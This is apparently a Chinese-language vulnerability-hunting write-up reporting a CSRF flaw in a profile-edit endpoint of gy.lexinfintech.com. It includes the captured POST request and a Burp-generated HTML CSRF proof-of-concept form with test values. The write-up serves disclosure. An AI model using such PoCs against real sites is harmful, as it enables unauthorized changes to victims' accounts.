@1kbfree
2018-10-18T10:53:14.000000Z
字数 1011
阅读 1008
漏洞挖掘
1、打开Url:https://gy.lexinfintech.com/dist/action/index.html#/myProfile,然后点击保存并且抓包
抓到的数据包如下
POST /restful/post/gongyi_user_info_edit.json HTTP/1.1
Host: gy.lexinfintech.com
Connection: close
Content-Length: 28
Accept: application/json, text/plain, */*
Origin: https://gy.lexinfintech.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: https://gy.lexinfintech.com/dist/action/index.html
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: 这是cookie
name=only_free&sign=csrftest
2、经测试,没有任何限制,可以直接构造为csrf poc
,如下
<html>
<!-- CSRF PoC - generated by Burp Suite Professional -->
<body>
<script>history.pushState('', '', '/')</script>
<form action="https://gy.lexinfintech.com/restful/post/gongyi_user_info_edit.json" method="POST">
<input type="hidden" name="name" value="only_free" />
<input type="hidden" name="sign" value="csrf_test" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
3、在浏览器处打开